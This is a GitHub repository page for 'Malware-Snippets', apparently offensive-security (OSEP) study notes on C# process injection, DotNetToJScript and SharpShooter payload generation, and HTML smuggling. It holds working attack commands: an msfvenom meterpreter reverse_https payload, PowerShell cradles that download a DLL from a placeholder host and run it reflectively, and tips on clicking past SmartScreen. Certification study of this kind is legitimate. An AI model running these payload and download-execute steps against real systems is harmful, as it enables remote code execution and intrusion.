Skip to content

1Gould/Malware-Snippets

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
C#
C#
 
 
Phishing
Phishing
 
 
PowerShell
PowerShell
 
 
Tools
Tools
 
 
README.md
README.md
 
 

Repository files navigation

Malware-Snippets

These are malware snippets for my OSEP studying / research.

C Sharp

These are all managed code.

C#:

  • BasicProcessInjection
  • AdvancedProcessInjection
  • NtInjection

Basic Process Injection

  • namespace Inject
  • OpenProcess
  • VirtualAllocEx
  • WriteProcessMemory
  • CreateRemoteThread

Advanced Process Injection (Exe/DLL)

  • GetCurrentProcess
  • NtCreateSection
  • Read/Write Memory in current process
  • NtMapViewOfSection
  • OpenProcess
  • Read/Execute Memory in remote process
  • NtMapViewOfSection
  • NtUnmapViewOfSection

SectionMapInjection (Exported Function to use reflectively)

  • Same technique as above.

Allocating a mapped page allows it to be readable by other processes.

Execution

C Sharp + Jscript + PowerShell

For execution we have a few methods:

  • Build a C# console app, compile to DLL or Exe.
  • Build a C# console app for Jscript, COM Visible.
  • Build a C# Class Library, to reflect the DLL in memory.
  • Build a C# DLL with DllMain.

If we have a DLL compiled as a class library, we can reflect it into memory with PowerShell. This is an exported function that we can call from the compiled assembly (DLL).

The key difference here is that DLL's programmed with a DllMain function can be loaded externally with LoadLibrary and trigger on DLL_PROCESS_ATTACH. These are known as unmanaged DLLs.

Compile to Jscript with DotNetToJScript.exe:

Cmd > .\DotNetToJScript.exe .\ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.13.37 LPORT=443 -f raw -o met.bin
$ python SharpShooter.py --dotnetver 4 --stageless --rawscfile met.bin --payload js --output evil

This tool can efficiently be used with HTML Smuggling technique.

On Disk:

(New-Object System.Net.WebClient).DownloadFile('http://IPhere/ClassLibrary1.dll', 'C:\Users\Public\library.dll')

$assem = [System.Reflection.Assembly]::LoadFile('C:\Users\Public\library.dll')

$class = $assem.GetType("Inject.TestClass")
$method = $class.GetMethod("Runner")
$method.Invoke(0, $null)

Compile to DLL and load with PowerShell from memory:

$data = (New-Object System.Net.WebClient).DownloadData('http://IPhere/ShellcodeRunner.dll')
$assem = [System.Reflection.Assembly]::Load($data)

# Namespace.Class
$class = $assem.GetType("ShellcodeRunner.Program")
[$bindingFlags = [Reflection.BindingFlags] "NonPublic,Static"]

# MethodName: Run
$method = $class.GetMethod("Run", [$bindingFlags])
$method.Invoke(0, $null)
Or
$a = [ShellcodeRunner.Program]::Run()

JS + HTML Smuggling

Just browsing the file will cause a trigger to download the executable. Unfortunately, a warning may be displayed due to the potentially unsafe file format.

Note that we chose to browse to the HTML file with Google Chrome since it supports window.URL.createObjectURL. This technique must be modified to work against browsers like Internet Explorer and Microsoft Edge.

The reason this happens is because the executable originated from a download through a browser. When that happens, it is marked as such in Windows and the SmartScreen61 feature tries to block execution. We must click More info followed by Run anyway to execute it.

Internet explorer does not suppor URL.createObjectURL, so we can use msSaveBlob.

About

OSEP Malware Snippets

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages